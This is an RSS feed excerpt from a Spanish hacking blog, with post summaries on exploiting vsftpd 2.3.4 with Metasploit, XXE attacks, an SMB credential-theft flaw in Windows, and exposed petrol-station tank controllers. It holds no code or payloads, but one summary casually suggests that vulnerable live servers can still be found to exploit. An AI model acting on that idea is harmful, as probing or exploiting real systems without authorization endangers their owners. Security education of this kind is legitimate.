&lt;p&gt;En esta ocasión, os muestro como podemos &lt;strong&gt;explotar una vulnerabilidad con el Framework de seguridad Metasploit&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;En concreto explotaremos la vulnerabilidad &lt;strong&gt;CVE-2011-0762&lt;/strong&gt; en el servicio &lt;strong&gt;VSFTPD v2.3.4&lt;/strong&gt; para conseguir una shell e interactuar con el servidor vulnerado.&lt;/p&gt;
&lt;p&gt;Está vulnerabilidad &lt;strong&gt;tiene ya 5 años y es muy antigua&lt;/strong&gt;, aunque nos podemos seguir encontrando algún servidor que nos permita &lt;strong&gt;«jugar»&lt;/strong&gt;, la finalidad de esta entrada es aprender como usar los principales comandos de Metasploit.&lt;/p&gt;</description></item><item><title>XXE - XML External Entity - El Nuevo SQLi</title><link>https://hackpuntes.com/es/posts/xxe-xml-external-entity-el-nuevo-sqli/</link><pubDate>Sat, 30 May 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/xxe-xml-external-entity-el-nuevo-sqli/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/xxe-xml-external-entity-el-nuevo-sqli/xxe-xml-external-entity-el-nuevo-sqli_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/xxe-xml-external-entity-el-nuevo-sqli/xxe-xml-external-entity-el-nuevo-sqli_banner.webp" alt="XXE - XML External Entity - El Nuevo SQLi" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;XXE (Xml eXternal Entity)&lt;/strong&gt; es un tipo de vulnerabilidad que se produce en aplicaciones que hacen uso de &lt;strong&gt;«parsers»&lt;/strong&gt; XML. Es decir aplicaciones que reciben como entrada un documento XML y para procesarlo hacen uso de alguna librería de parseo como LibXML, Xerces, MiniDOM, SAX etc. El atacante entonces puede aprovechar esta vulnerabilidad y enviar un documento XML especialmente manipulado para conseguir que el parser XML divulgue información del sistema, consuma recursos en exceso, ejecute comandos u otras formas de explotación.&lt;/p&gt;</description></item><item><title>Nueva vulnerabilidad SMB afecta a todas las versiones de Windows</title><link>https://hackpuntes.com/es/posts/nueva-vulnerabilidad-smb-afecta-a-todas-las-versiones-de-windows/</link><pubDate>Tue, 14 Apr 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/nueva-vulnerabilidad-smb-afecta-a-todas-las-versiones-de-windows/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/nueva-vulnerabilidad-smb-afecta-a-todas-las-versiones-de-windows/nueva-vulnerabilidad-smb-afecta-a-todas-las-versiones-de-windows_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/nueva-vulnerabilidad-smb-afecta-a-todas-las-versiones-de-windows/nueva-vulnerabilidad-smb-afecta-a-todas-las-versiones-de-windows_banner.webp" alt="Nueva vulnerabilidad SMB afecta a todas las versiones de Windows" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.kb.cert.org/vuls/id/672268" target="_blank" rel="noopener noreferrer"&gt;Nuevo fallo al protocolo SMB&lt;/a&gt;
&lt;strong&gt;(Server Message Block)&lt;/strong&gt; que afecta a todas las versiones de Windows, esta vulnerabilidad ha sido clasificada como grave. Dicha vulnerabilidad &lt;strong&gt;permite que un atacante pueda robar las credenciales de servicios del usuario&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;El error está relacionado con la forma en que Windows y otro software manejan algunas peticiones HTTP, y los investigadores dicen que &lt;strong&gt;afecta a una amplia gama de aplicaciones, incluyendo iTunes y Adobe Flash, algunos clientes de GitHub, Oracle y AVG Anti-virus&lt;/strong&gt;. La vulnerabilidad, divulgada el lunes por los investigadores en Cylance, es una extensión de la investigación realizada por Aaron Spangler hace casi 20 años, conocida como “redirect to SMB”. Esta debilidad puede permitir a un atacante forzar a las víctimas para que se autentiquen mediante &lt;a href="http://www.estacion-informatica.com/2013/03/evita-hijacking-en-tu-cuenta.html" target="_blank" rel="noopener noreferrer"&gt;hijacking&lt;/a&gt;
en un servidor controlado por el atacante, mediante ataques &lt;a href="http://www.estacion-informatica.com/2015/03/lenovo-no-era-el-unico-con-superfish.html" target="_blank" rel="noopener noreferrer"&gt;man-in-the-middle&lt;/a&gt;
y luego enviarlos a servidores maliciosos SMB. Con lo que ello supone, robo de credenciales.&lt;/p&gt;</description></item><item><title>Accediendo al sistema de control de las gasolineras</title><link>https://hackpuntes.com/es/posts/accediendo-al-sistema-de-control-de-las-gasolineras/</link><pubDate>Sun, 29 Mar 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/accediendo-al-sistema-de-control-de-las-gasolineras/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/accediendo-al-sistema-de-control-de-las-gasolineras/accediendo-al-sistema-de-control-de-las-gasolineras_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/accediendo-al-sistema-de-control-de-las-gasolineras/accediendo-al-sistema-de-control-de-las-gasolineras_banner.webp" alt="Accediendo al sistema de control de las gasolineras" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Ayer por la noche estaba leyendo un articulo de &lt;strong&gt;Amador Aparicio de la Fuente&lt;/strong&gt; en el que aseguraba que los conversores de serie a Ethernet del tipo &lt;strong&gt;GC-NET2 32-DTE&lt;/strong&gt; que &lt;strong&gt;utilizan las gasolineras españolas&lt;/strong&gt; para controlar los tanques de combustible &lt;strong&gt;eran vulnerables&lt;/strong&gt; (más que vulnerables, mala securización), nada más leer el artículo algo me decía que &lt;strong&gt;ya había leído&lt;/strong&gt; yo eso en algún sitio, hasta que recordé y ví el siguiente &lt;a href="https://x.com/cybergibbons/status/558551285776273408" target="_blank" rel="noopener noreferrer"&gt;tweet&lt;/a&gt;
, que en un principio no dí mucha importancia ni me dio por investigar.&lt;/p&gt;</description></item></channel></rss>